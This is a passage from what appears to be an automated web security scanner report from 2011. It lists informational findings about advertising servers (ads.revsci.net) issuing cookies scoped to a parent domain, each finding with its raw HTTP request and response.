Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 01:55:22 GMT

12.21. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_cq85="MLsXsF8ubi5n4JDyzowlSBbxpQnwGsaEu/PC8n+5VFKBZFiot29LyxVRkzZAFjNpcJ1iCf5x8wb47OfER+70+KpE+UnSMkbFSIrdk96nO3UaWMTESWUpK3OqyDwU+EA/5R8Xf2DD8x4RmpjwIzLVwKiwQ3OFNmbSHqqZn5iMigi7JoO6ztNRmL1mxYWhBSC0DILl88ybW6M+cQpWnZDY0MdXGPdCs6Dk6T/5787NFvTrHYiNQkaAQXrvVknibEJ2Q3EEI6eA8RHWXnsWl3dsumEcJ4AZQLWPtn8GUbAKtpnDk4QG8tRZvs9uUMCro5ahZOoKWY/NuurXK+xiuXPUMnMlb9G3jNnS1qDw5q+tUhXm3KfSyzsyTJOTgNUtMpTnWzmQrnEghGoIuyZuaegLwU8Hbd5/IEQzTkZ8de2MzHz5ZbekRfbuw54TFc+0wtgB9f5ZYPt8rOk="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJE9HCAYYlW23lB0u4DcmSH3vrseeRRdc+/iC2/EpD4wnnWVpr8KNuLTYoCJisXn5HT6xtGlexMb/gCd8NEgmVWrScu+R6IK9f5q3gdIzGYbvvIWq2gHYcb6WtSO2eXRkOJUg0hglaqnjXXwOtkFUCqodVLjnzxSp/ocGHhDb1e+NKdqA60VtitzaEjn333JOpoKabSD/s+4LcFeRFZTgI55WVwB1oQEDOQBU6Kcx3qbkKAZeLnuEILa513lbVZwiijORoR9b+gLscYYm9oc4YXZYG+kKyAKVGk23nIxNwnZE+ztabap2OEbvi5J9kgByXK6iiY36G9CAOp6W3g6HPohG+1esZzkKXUpCJfNXJuWR/nAE4eRcT/QWS3w947o39G+CKm8b1hgMDcaOwXgr3SDf1gr6+Ur3tB69BQlRKyHuBuJwKsma4HIdpkK0aaox773kdEYdgUlodh7asCKRrRcMMN3FLt/HISxWSaLQ30YAt1VAMwzttcWOYkEu+j0G7Q9hAKyh18R9a7kSQoFt3+9406AJ0FDSG0olZv0hovf+CndgqByq4SVT5LuB/xh7yEugipKJGSdZw9+k8qOSyv7ni4dw8f5kbgwpNfRIQ4epfWPOOy4uiHB5JZ7B/iTUk77AIXjpdUzD4Am1JWZ3fEOvztWHc4smVf/rFfjhsENJq/YEjZ8GZUinFSFyJWDDCKPQ8It6StqkbwjLbk25MlGZZer7Nk4G1fwGl69syX8EgKN+qKDQqnJmm9PC9SfkTQoBtDA1jsm7/Io7mjIY/Bp/ykaRtJZsNvAN4KR01lPxjycRQLEMblStMerh9Bqya5ugvWOHNRCfJ9ZFRMFWmNgmblJiFUoUyJIwzFeLMss/mSBKB2IJ2CztZJjB/Eo+Q4k27iRW/HbnkgY6z6wwSdm2l4MKREXIPLmRzVQ8lkszqQl1S8Z7mjnNwqtKTjpyn6PKTiX/9dh5XffRWEzn0zymQBTAy55jjM7Ilqs1haSE+cov/8/4FeGVFGUebrMZKyv9aG2VN9zz6aOQJLA22YS4NdmcEQwNAT2mjcPDxTrEzm0SMIk4uw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=7050454176496.714?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv39S8JaSpnph4dB7K/U2jMrlZxPiFsbBfSBcrlROJywhuHqR1r/UA1T0iRssIdAE9WG5SkuBEsQUD3IuuN09ImomKQMeFq1jtxllLl2hNvJ93zI8nQT72tjMgtUdO//9wYgRqB8ZXuPro+o7BxsBR5pxD7EXVtXGydBkVQEudXG2D2wIkNBeqHmIWJj+bGrdjGRyWixast+xLN0K4Iw+ew6ThmTEKns4HxFbcBnFLmChGZ934MWdGZXXYRWuhxS3cwBXNGIONtB2mXemfgyEqzd2IBmI9G7wogGLDx8Lw0DAp53p7JuTlqcYDDCICXYM9H2ZnYlIi4JrCJzCy8WcgNq18GmmzuaTOz/CYt2C7l9cgcwecxI15dlo8KJWy8mdmvMATQlBQZvvshGx7/ZWO+n5+L+o3XoVAx3gT2aCZHqJjly/K2Xoj1Qw67qH0PuJYpMK5P/KiQ3zOVyfP/ypI3utDRIhc08fTvQR/OwZZuegUWhFE/sq9FQhAzxOxIUTEvSResbfdfBhvTYofAJyTSyywbmhBb1MDtD0AFkYRyczjrYj2sKaFHZRb4fmzvPKfH6Zk5gmTLJV0gMS1UqtVy/S2L8TpN/clrGMHfxjNSPD5FT/EJtkm0EFhEQ27Z/cReQRxmltlL0MzcDhcs4e/wDwceblUp0um7chLLj/9/l1yBXBuwEgHk1flpVPkRmS/XI+a+2dCRvFnQSugMULpDNrA24o1pFVOIWNzLGZT2Krf+nzgF5TV38bNdoImSe5zwcruCXUG2Ktx5bQZtk7hjyijC/wmaioSX0PWNvks1FPlRUSXt/go8LnugdkWwYNOashsf6bBdytaAhOmPeOITWXSATA4ZE5SyPxGC0Znb3KDFATW1t50eAoudsHBsRbGRnxbn5H9cjPONtxL7egOM2+ltX2Nj9k3QVOzWzXEbkqT5akyVl21my7/DhratEWYI71JWlJ+9P5DWoLAVAyHTfXhezKMST83PEAtbhYhRavvp7A==; rsi_segs_1000000=pUPNfkOBbgIUFmLCHes0KW6m3ZgQXnnQ2eTN9Oww/xC5n7e8t97wZrFpPHW1rmtgC9BicX3TKz2eCELNYrMRQ5Lqu2zxeyWWfvlSUcVQiomYts8ECBn+Htu45MvaZOVPjeiVX8Zn2dbYnd4CY/vI2hWo9+I5cVgso6DGe8kTro5udIZWJUPSA1+To+3klpCjRbw2Bad0n9tXCulP4zeaUmaiTlY9FzqRkpBXPIFsEjprZNo=; rtc_dUn8=MLsvsNFKMT5nJ5GuU8+Vm/S3bm5E5k5tMt3NnMGp0iPrRxZIAPXk1sWJJd0/criBZWlpdqwlBoSERTTrYCc/gUIlS1FVffKLHMTvhZ2/kRd2fDWGXo0973OxjVJvM4sWN23lbJTGpwkPvUZano6YF0AUV+JeNaoAt8+pSbKbdnsUNCEdADOFfSeqyYTDSDEIe2vG2nUWVvCrZ+mEz9AYFmDW2hNSjGBpITTC96K7z8YQwS3lvAdlwRZUXU+bm0B6nc2R3bprYgz8eD2Ov4Fe4x5XnK8Mne17nReJOAJZHIgz5IbuNCwt4XEkjz14AaSmzHNOpukOLKJpmILuaSsa9st9voigEMZmhjkK3mkyeJhApPsJEbab/3lzTO39mzt5Z54rippve02eRS7gFHqfCoB3HzprQxzA4Cf+P+TfZnKZ89g=; NETSEGS_D05509=82f4957c1a652091&D05509&0&4df56df0&0&&4dcf5b30&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_eR-U="MLsXsF8ubi5n4JDyzowlaElL3byjGsaEu/PCsfHs+PiZBmLkCOD/CYU4iQ1FIB9JIdEuByvn+LmEbSTfL+ykre7wDUIX/wZ6lnteDZlY2GW0rSpVxafl8+M3Fk56Oh4ptMD+hYqX/cAyWYPZh9GLnbzcK72OcuSYGrrJEpXB+DSR95aZykdxmdsZqoaEFcUJuWv1BvXF/JDG/GCNqis4ms/VQEqjV9l+cBVLcmp3g+IkQxuhqkO4h33GXxQRehGwbDMII/X908qfFBBE/BhoJgSDVTQJgbfrr9VStGZJoYAHBxqDSrtQR7zRdEPW+PODtnDjF0aDwrfsnCXsDZAllz5pIm7H8vTOz6Tp6rXuoEwC4tmm90X2zzZQgJINuTSRjmwwSlO3YJyhcZWsYanJtkzqYPXKdjC1vv14LmMCzQv0FuHGVbAUx1aTy5CEjIMWepRHnGiBj/50"; rsi_us_1000000="pUMdJE1DNwYU1Q0E1idLvS/Qn1LhCaXl4R9qqwYfg6rt2+BCR4J+oeH8rPyHk4Hhw5b9xqtsZIdLnAad3UntXGuWxHrABhvpw7cPDxvXQRN62WmlqhL4fC7+WOSMq+dvWgT4ebPl2lFpJuP7uXyCyqg4XAT44TBqEswHmQT5L4Ra/sPnYBWm9xMVQXMRRKtR9GzhJyZLGjpIBA5vWbPzkqrcTd3qbM08co60XhnAKcmrFRUrEudr+/kKU87L0BiqM70g5syIrFQBrlIuwD70ryaPu2eDT20zv7ah015/q4awN6VJ+8rsxj6XZD+0i84pw6Gy6i8fKsPkE8uNlzhWUSTmQhNHOW+k5ncmOAas7xfJ4rqL6ScIwiRVrTreOaLihWYFvg/BJGpbqqkvRbSEeFyZ5KjlpwyIYLwxe5zlFun9kh5wTX7ejF0QZcJtI9kBsn7Lkf5sMuCroQwb82dLm/jPC6EsMPT0XkFh5S98efmvFzOLVDMbgwQfSeonUcsOVnqT7qVHtsDZmgLzokkYy0LbaRGOiMipFRWwDEj3guK/+YGv/C+2fgu0fiORZyKR3jB4N/e6B32HOXDw9nbXtgxToquUZ0Jbjde1ZEuPl4zBTScNWkKfhPjGddppEEFIZw4zrfFa8LgPIBu67lO4i/5H0GaIz9kpcCmZrWX9vOf1HuNbA/tDWC/dJ/w84saSyOHCom0UPlRlu5gF0gnYI4FXWF36+CMlx16c5rjhTlGIIxRDCjW4DfnlpqP8DtNn6e8e7Hq0kIY5aruJQOtYm8IY63ik0p+xKL6x/CQZu7dhDEdqxpDgMf097hSt8cpxx9qylfs9ZTTUaJbwSuQ9HHojxHU2cjzd2kVEcDjTdtSJ0CXD7BBHwg51a2ApHdMJXw5+CREwr4B3pSD0g24vvqG+sWzcENOyHgGktJc/jU1UciLYFrFNu/IYCUeV/GvJyS0qf6LOzhGDndsN6oL4iKMbxnwWClajU0lGucg1dKqXHu4gd8sp27c/dcEJPiOi9TLtSYHz6A0onmkiY/c0dk/B7LDgldJHmYwSTJ1yHydKsSFjNsXGfGeq"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_eR-U=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_eR-U=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cq85="MLsXsF8ubi5n4JDyzowlSBbxpQnwGsaEu/PC8n+5VFKBZFiot29LyxVRkzZAFjNpcJ1iCf5x8wb47OfER+70+KpE+UnSMkbFSIrdk96nO3UaWMTESWUpK3OqyDwU+EA/5R8Xf2DD8x4RmpjwIzLVwKiwQ3OFNmbSHqqZn5iMigi7JoO6ztNRmL1mxYWhBSC0DILl88ybW6M+cQpWnZDY0MdXGPdCs6Dk6T/5787NFvTrHYiNQkaAQXrvVknibEJ2Q3EEI6eA8RHWXnsWl3dsumEcJ4AZQLWPtn8GUbAKtpnDk4QG8tRZvs9uUMCro5ahZOoKWY/NuurXK+xiuXPUMnMlb9G3jNnS1qDw5q+tUhXm3KfSyzsyTJOTgNUtMpTnWzmQrnEghGoIuyZuaegLwU8Hbd5/IEQzTkZ8de2MzHz5ZbekRfbuw54TFc+0wtgB9f5ZYPt8rOk="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE9HCAYYlW23lB0u4DcmSH3vrseeRRdc+/iC2/EpD4wnnWVpr8KNuLTYoCJisXn5HT6xtGlexMb/gCd8NEgmVWrScu+R6IK9f5q3gdIzGYbvvIWq2gHYcb6WtSO2eXRkOJUg0hglaqnjXXwOtkFUCqodVLjnzxSp/ocGHhDb1e+NKdqA60VtitzaEjn333JOpoKabSD/s+4LcFeRFZTgI55WVwB1oQEDOQBU6Kcx3qbkKAZeLnuEILa513lbVZwiijORoR9b+gLscYYm9oc4YXZYG+kKyAKVGk23nIxNwnZE+ztabap2OEbvi5J9kgByXK6iiY36G9CAOp6W3g6HPohG+1esZzkKXUpCJfNXJuWR/nAE4eRcT/QWS3w947o39G+CKm8b1hgMDcaOwXgr3SDf1gr6+Ur3tB69BQlRKyHuBuJwKsma4HIdpkK0aaox773kdEYdgUlodh7asCKRrRcMMN3FLt/HISxWSaLQ30YAt1VAMwzttcWOYkEu+j0G7Q9hAKyh18R9a7kSQoFt3+9406AJ0FDSG0olZv0hovf+CndgqByq4SVT5LuB/xh7yEugipKJGSdZw9+k8qOSyv7ni4dw8f5kbgwpNfRIQ4epfWPOOy4uiHB5JZ7B/iTUk77AIXjpdUzD4Am1JWZ3fEOvztWHc4smVf/rFfjhsENJq/YEjZ8GZUinFSFyJWDDCKPQ8It6StqkbwjLbk25MlGZZer7Nk4G1fwGl69syX8EgKN+qKDQqnJmm9PC9SfkTQoBtDA1jsm7/Io7mjIY/Bp/ykaRtJZsNvAN4KR01lPxjycRQLEMblStMerh9Bqya5ugvWOHNRCfJ9ZFRMFWmNgmblJiFUoUyJIwzFeLMss/mSBKB2IJ2CztZJjB/Eo+Q4k27iRW/HbnkgY6z6wwSdm2l4MKREXIPLmRzVQ8lkszqQl1S8Z7mjnNwqtKTjpyn6PKTiX/9dh5XffRWEzn0zymQBTAy55jjM7Ilqs1haSE+cov/8/4FeGVFGUebrMZKyv9aG2VN9zz6aOQJLA22YS4NdmcEQwNAT2mjcPDxTrEzm0SMIk4uw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 10:42:03 GMT

12.22. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_L-X0="MLsXsF8OZi5n4BC7CEQANzy/1tkH/1R6T7S5z2Fu/1ZdyDcMqjB3UfR+EgHU8X4ksrVgy/Rz8x5trlkaRECoNMLefiivRJt2FSces26J094xJ83B/839DFleaBDLRohSlAV8cpPInIvVz89Y7xsejcWODt9R/gyFvKssIz6J1ZKnfIDZnh498xJl7+/KNV8X6NaOn5sOc/2crutdINmb6SjYm5/o39bKqJ3lsv/ufqykgLW6bFGCdxMIct6rbb03ZFShfm9rBIi4EFNh71KUzfigSzTGIl979lRdhOaxbsRsHH/IHdX3B6eZu5yScSdoRXhv4T+NLxAHJeaSWhd2iSuscBVEm14yRic99IhVBxJCQAQfxVHWrrWMmcSIot2Xc9zXZmllbUJ5MUniuwtpDzfMfJGkIdV2LYIBTuaw56nZrsRqAQQu1rdWet9dyZycwRd1bxIYIaFo+WI="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJE+jMAYYlW2Evr0qOsoHgT7/5aCXkF76a5ePIMnACJA/zkSMZZZuo+iFozW34dnftER/2bN/1fhchSGk4TkgcNOSojrggJL3ZFtV5Dd9oVCaXJbX8pxgD0MiS7mTwQUeKRExmwD2TqDTsb4XdEuaU/leOWPzn1cdd1EBG9jdUFd+SR9ASj5vXqfp4Bx8r3MacxU5b0lfv7P581V3c5dlIjXXSV52gJZMBjFjopQWNVNDDgiaUGOlUCF9e1Z8U3nqZACYtYsTSct7T7Y2dQQyK6yaRz20ruhMzz0i0MLM5FR2b4SR1zi+MNvt3aFe6ba85gDmG5K/e5ZKvT7wP3TplRP+VPkcshnnvkHEgQSwZQ4Sdl0azi6K8eSEhn1prYcA2h/AJWUuemh2PflYDgWQWEawPoOsxaaMNfquZindF2tuVM3T3nYy1lhqDS6tj2PMjilZqVGYsvpW4D1W5BBVupLWtXnqbJFOmYsdZ/uYPTEFb8i6Vw8fCPfpx/jFJBwkcZ/Dvh8sVo2JGo6WH+tdG6c7W9EOOlONQ3XBE44lm2eOm03FqV/yP12N22/soxYzWkkBJ1HHE0dhhYDQLR3+MTSnq5JuljXXQ1R5O/lQ2bC8UjtGuBp7MxQi0jXgyjFmZ4sM4jC1HScaAozIsxMmRYw6fR4+OT1F2175YEAMBwIFF6geXyFxNriAcnRIyIy2XmUUzOk07F2aj0fQQKXeRpsruDRmKI9ryjbmaB6Nxcvm3R3N4h3COgmMy9CGSQkalvvwJgLreKo3tjctopQJuSKMpesYQbKl9jj50Pae3gOxuKfOMq5zif7fK0dsDFjuyb2eZQyBbjsZVV68AzmX9MxiEcEhGwgvNfRJ7b8mvtAdjWUr35gJvb/evgZux7lLgRothRSCjmbzJFqqYiEmizTr4kfqFOR+CHcxk0s57o2j5758Z9B9kChcIW/FNWdjusFHa9qy0bgpzErI83/uwfWGtvBTd6wlqo/kNu60lhyd2TsufCmaFlQnDsvcSvFmWFdJjexUCTffup1s6pZ8mOPN9PZDM+cmF6XKMGta3Bv2og=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=47C4A5B52F56DA1048BE0364F22EE23B&rsi_site=7CF6289AC01B12B6FAA4EB07CBB7EE34&rsi_event=D00B721BDB5235B5FF65F9D8E524EF85 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv39S8JaSpnph4dB7K/U2jMrlZxPiFsbBfSBcrlROJywhuHqR1r/UA1T0iRssIdAE9WG5SkuBEsQUD3IuuN09ImomKQMeFq1jtxllLl2hNvJ93zI8nQT72tjMgtUdO//9wYgRqB8ZXuPro+o7BxsBR5pxD7EXVtXGydBkVQEudXG2D2wIkNBeqHmIWJj+bGrdjGRyWixast+xLN0K4Iw+ew6ThmTEKns4HxFbcBnFLmChGZ934MWdGZXXYRWuhxS3cwBXNGIONtB2mXemfgyEqzd2IBmI9G7wogGLDx8Lw0DAp53p7JuTlqcYDDCICXYM9H2ZnYlIi4JrCJzCy8WcgNq18GmmzuaTOz/CYt2C7l9cgcwecxI15dlo8KJWy8mdmvMATQlBQZvvshGx7/ZWO+n5+L+o3XoVAx3gT2aCZHqJjly/K2Xoj1Qw67qH0PuJYpMK5P/KiQ3zOVyfP/ypI3utDRIhc08fTvQR/OwZZuegUWhFE/sq9FQhAzxOxIUTEvSResbfdfBhvTYofAJyTSyywbmhBb1MDtD0AFkYRyczjrYj2sKaFHZRb4fmzvPKfH6Zk5gmTLJV0gMS1UqtVy/S2L8TpN/clrGMHfxjNSPD5FT/EJtkm0EFhEQ27Z/cReQRxmltlL0MzcDhcs4e/wDwceblUp0um7chLLj/9/l1yBXBuwEgHk1flpVPkRmS/XI+a+2dCRvFnQSugMULpDNrA24o1pFVOIWNzLGZT2Krf+nzgF5TV38bNdoImSe5zwcruCXUG2Ktx5bQZtk7hjyijC/wmaioSX0PWNvks1FPlRUSXt/go8LnugdkWwYNOashsf6bBdytaAhOmPeOITWXSATA4ZE5SyPxGC0Znb3KDFATW1t50eAoudsHBsRbGRnxbn5H9cjPONtxL7egOM2+ltX2Nj9k3QVOzWzXEbkqT5akyVl21my7/DhratEWYI71JWlJ+9P5DWoLAVAyHTfXhezKMST83PEAtbhYhRavvp7A==; rsi_segs_1000000=pUPNcDPB7QMUFVJmHElW1WAhFpB0I5EmV+QHrdRrcAMkOX+o7LQjAQv0aGumjYcA+pD55MfuOfQbGooH3qorp++zHuX/61m4ao1z4yL4Lb3cyf2EkQb/3ZOSwdnh6MSu2Um4QVZJKClGNz2Fl9QeLKxco3pM/j3xxqXi/RBfDYQLHw069nJi4GhHujSDyULrAXw98qMzqzoEqWE=; rtc_6axN=MLsvrdMvcT5jJQFErn5VSDYGHlHr5G4IUDwGBCOQN50vl8AxTgkQ69k2sWbYhD5swupGFuttZZ30pjREZ/ZkKkhmVOC4XP9dHEpHAm3ADaku92HBduCPjDheEZyi3USKjMyJU8PKvSGf6dbgKbkkF1T9nPoTyICKBODL5dWNTWGJSo//SZoNqh0jXWrCVj5fE0hG1/Ew1855Q3kGOJISwLZwyFyrdDpPp9pEr5K7YRGtS1DhqDKb+B3xI4h5pUmK196H1VYARyez77DbY8fCN3YqmgkgAm74R4TtPLq8byYJ7dh3Jpzg7zgqcfYD+8HJFFf4m0VurVwRBH7s; rsiPus_Ue6V="MLsfsF8OZi5n4JASs5Bk9KNTJTvS8f2Fu11GHPEzhKyi3GQrQ7BmTve2OJAm5dkicVDq6exz8/7mVp8gLWwFrCZXqjnrP4dY+oskzV6Lm6fDGU/pc7sD4QgyAm917NYUdYZyl4Ge77s9UIFZQ17LzY6FmFr+dbOm/q3NRviYsxYxEdT4BuWckICBhlynfvy70YiGCMlO6qasmF2ihg+pO2oJnW6u/sK+jrGeJcPD5bkfmxdZkcxFCdRcP+5WTqdsCmcLf0Ex4rcKXrvjrnu0sTHtBT5McF9fDxSJ/5F4rhGctF7ufabWD//giGZVhajmlKJ5/ghKjM+xp5IlgyRWbpVdfNtrcTGZkm4rs+yrKxT60qWH9+m+GDthRw4NqX5srVtjKqBYmXFoYwBh69bL8neIN/fo324IeUZkNTAbckLX2a5MG66S3qymz5fMI7YY007gYORN"; rsi_us_1000000="pUMdJE1HMBYc1A1qdrcIJDxQsPOLjDoxzTAyNtIHury3GtT68G8x1wl2w/HHUtqHQsCeBaP1P6FXhHb2gFvElddwSHYuHGTrUzB1JmqVJnWnfFraXAJ0HXSsWsKsenfLwmMuKZfjvBEQWNpdP7FfD8xp5hLRMwezltge4Do9QX1mZyppg6fuXPp4j9WR9yOzLIEyFyYvYnmhyaVpmd2KE5SMk4UkzjeJic7ys+Ry7RIyWuckExTC3z42TMmr1xnTwvQxn6DymxrH6BA8apr+dsG+HX4oH3b2M5RjVR9OEduFKxCoKYg3hqhEwyrtCz0XpgfqRX4gqNohc1/W2RnNT975CgaLAwjh11y5uqnDue9wUha5TfzEIxMAivPyPaOEYCti+DNtlXFK/0jfGgfxlCevyrLhnDrN9WTkWTTkovOWctoce/yYdYwnZjyAK/WrNLPaLcyahlyzYtXLzEW2+TB6t7lvfvkKKVoTjyd4+fq/G/OzWz/okwSYqsojVcuOKXZfkvZQFM+uZ7jdB58SXgHb34YzYLTOk4Oqpvvtbh8FiVnclF92CFDfw8dICduFuGmKuoygMWLbrVVOdFM+aW/0MIZPT47Y8WbzHfFrk3FeGzSTYzL9KCoaL+xOhl9sHKdX2YJ5S2NsdXMCRPfLV1GAMP4xC+NpacNHSzF0laIoxYEIa/ODB2HQ2uznY9aWOpFh+wcRIXA8Eo1bmEftV4VMIPjGcSoikr9RSBZ0GzGq+KYm17TfZzW85AnXZZMkWMAzBqSS0J7jIKDrJPSeuTPgBB2gffcvWmJT0GdRXvgBEVFgEi7KVR8PyfjcHGSqmBKdP1LCkTSqLigTCBX9xnHOu2x1pnCXrkbZavqIN2ckvtAdbWIr3/gJvX/efgFmx6k3gdoqrRSCjkazJNqrZiEmZRpOkGChbBt6n2xW6mdY0EYYU85F0+JxyWlaMlMzMJlE5djHMETBllGwYzgApDsNyhbc007zWOjl31mNUCRbmDJBE9Sj45uNmsYg4hAkOLV2WFVOj+5UKDffup1s6paMmFPN9PB7E+cmdyXEMGtKOnL1ng=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ue6V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ue6V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_L-X0="MLsXsF8OZi5n4BC7CEQANzy/1tkH/1R6T7S5z2Fu/1ZdyDcMqjB3UfR+EgHU8X4ksrVgy/Rz8x5trlkaRECoNMLefiivRJt2FSces26J094xJ83B/839DFleaBDLRohSlAV8cpPInIvVz89Y7xsejcWODt9R/gyFvKssIz6J1ZKnfIDZnh498xJl7+/KNV8X6NaOn5sOc/2crutdINmb6SjYm5/o39bKqJ3lsv/ufqykgLW6bFGCdxMIct6rbb03ZFShfm9rBIi4EFNh71KUzfigSzTGIl979lRdhOaxbsRsHH/IHdX3B6eZu5yScSdoRXhv4T+NLxAHJeaSWhd2iSuscBVEm14yRic99IhVBxJCQAQfxVHWrrWMmcSIot2Xc9zXZmllbUJ5MUniuwtpDzfMfJGkIdV2LYIBTuaw56nZrsRqAQQu1rdWet9dyZycwRd1bxIYIaFo+WI="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE+jMAYYlW2Evr0qOsoHgT7/5aCXkF76a5ePIMnACJA/zkSMZZZuo+iFozW34dnftER/2bN/1fhchSGk4TkgcNOSojrggJL3ZFtV5Dd9oVCaXJbX8pxgD0MiS7mTwQUeKRExmwD2TqDTsb4XdEuaU/leOWPzn1cdd1EBG9jdUFd+SR9ASj5vXqfp4Bx8r3MacxU5b0lfv7P581V3c5dlIjXXSV52gJZMBjFjopQWNVNDDgiaUGOlUCF9e1Z8U3nqZACYtYsTSct7T7Y2dQQyK6yaRz20ruhMzz0i0MLM5FR2b4SR1zi+MNvt3aFe6ba85gDmG5K/e5ZKvT7wP3TplRP+VPkcshnnvkHEgQSwZQ4Sdl0azi6K8eSEhn1prYcA2h/AJWUuemh2PflYDgWQWEawPoOsxaaMNfquZindF2tuVM3T3nYy1lhqDS6tj2PMjilZqVGYsvpW4D1W5BBVupLWtXnqbJFOmYsdZ/uYPTEFb8i6Vw8fCPfpx/jFJBwkcZ/Dvh8sVo2JGo6WH+tdG6c7W9EOOlONQ3XBE44lm2eOm03FqV/yP12N22/soxYzWkkBJ1HHE0dhhYDQLR3+MTSnq5JuljXXQ1R5O/lQ2bC8UjtGuBp7MxQi0jXgyjFmZ4sM4jC1HScaAozIsxMmRYw6fR4+OT1F2175YEAMBwIFF6geXyFxNriAcnRIyIy2XmUUzOk07F2aj0fQQKXeRpsruDRmKI9ryjbmaB6Nxcvm3R3N4h3COgmMy9CGSQkalvvwJgLreKo3tjctopQJuSKMpesYQbKl9jj50Pae3gOxuKfOMq5zif7fK0dsDFjuyb2eZQyBbjsZVV68AzmX9MxiEcEhGwgvNfRJ7b8mvtAdjWUr35gJvb/evgZux7lLgRothRSCjmbzJFqqYiEmizTr4kfqFOR+CHcxk0s57o2j5758Z9B9kChcIW/FNWdjusFHa9qy0bgpzErI83/uwfWGtvBTd6wlqo/kNu60lhyd2TsufCmaFlQnDsvcSvFmWFdJjexUCTffup1s6pZ8mOPN9PZDM+cmF6XKMGta3Bv2og=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1052401&t=2
Content-Length: 0
Date: Mon, 16 May 2011 01:58:30 GMT

12.23. http://adserver.veruta.com/track.fcgi previous next

Summary

Severity:	Information
Confidence:	Certain
